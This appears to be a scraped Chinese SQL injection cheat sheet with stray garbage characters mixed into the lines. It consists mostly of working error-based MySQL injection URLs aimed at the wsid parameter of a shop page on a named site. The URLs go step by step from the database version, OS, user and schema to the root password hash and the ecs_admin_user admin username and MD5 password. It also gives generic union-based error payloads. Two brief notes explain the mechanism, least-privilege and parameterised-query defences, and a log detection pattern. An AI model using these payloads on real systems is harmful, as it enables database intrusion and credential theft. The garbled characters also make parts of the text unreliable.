判断版本号
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
判断系统
; V5 N+ W0 z4 N3 _: v# A) L$ Ihttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23" k9 r/ c; m& x. {
当前 user()
7 {( Y* K' R( a$ H! ^. z8 jhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
当前 database()
2 M# W9 g4 ~6 V: r' nhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23! X1 ^9 j; H( X8 b2 l. C
root hash
（注：该查询读取 mysql.user，只有当应用使用的数据库账号对 mysql 库有读权限时才会成功；按最小权限原则为应用单独建账号并收回对 mysql 库的访问即可阻断这一步。）
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
当前 数据库表名
, V$ w, R: ?: ^, r, J1 _# M. Yhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23* m, U+ k5 J! Z9 R4 ~
当前 数据库 user_name 字段
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
当前 数据库 字段 password
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%230 A& ^$ d& e% |
获得 admin passwd(md5)
# }* `; q3 _/ w/ r7 K% ~http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23/ u% [! Z& W" L2 [* c+ v' H- o5 B* u
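报错注射
（原理与防御：floor(rand()*2) 配合 group by 会在临时表中触发重复键错误，MySQL 把拼接的子查询结果写进错误信息，因此只有在应用把数据库错误回显给客户端时才会泄露数据。对 wsid 这类参数使用参数化查询或整数强制转换，并关闭错误回显；访问日志中查询参数同时出现 floor(rand( 与 group by 可作为检测特征。）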
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)4 @) _ \; M' S" D
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a): m! Y8 k5 n6 @# ^ K- W
1 d: Q9 }8 D1 R1 z) v1 I+ P3 [" d+ Sand(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) |